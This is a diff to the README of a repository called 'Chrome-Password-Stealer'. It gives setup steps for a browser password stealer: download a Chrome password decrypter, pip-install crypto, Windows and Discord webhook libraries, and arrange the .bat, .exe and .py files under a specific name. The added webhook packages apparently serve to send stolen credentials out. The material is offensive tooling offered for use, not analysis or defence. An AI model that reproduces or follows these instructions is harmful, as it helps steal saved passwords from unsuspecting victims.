Sniper12356/Chrome-Password-Stealer/README.md

 then do start activate.bat
-Get the decrypter from https://github.com/ohyicong/decrypt-chrome-passwords do "pip install pycryptodomex && pip install pycryptodome" do "pip install pywin32 && pip install sqlite" copy and paste. take the decrypter file and put it into the pswdstlr folder download the .bat .exe .py files from this github and put it in there MAKE SURE TO NAME IT "cc.py" OR ELSE IT WONT WORK.
+Get the decrypter from https://github.com/ohyicong/decrypt-chrome-passwords do "pip install pycryptodomex && pip install pycryptodome" do "pip install pywin32 && pip install sqlite" do "pip install discord && pip install discord_webhooks" copy and paste. take the decrypter file and put it into the pswdstlr folder download the .bat .exe .py files from this github and put it in there MAKE SURE TO NAME IT "cc.py" OR ELSE IT WONT WORK.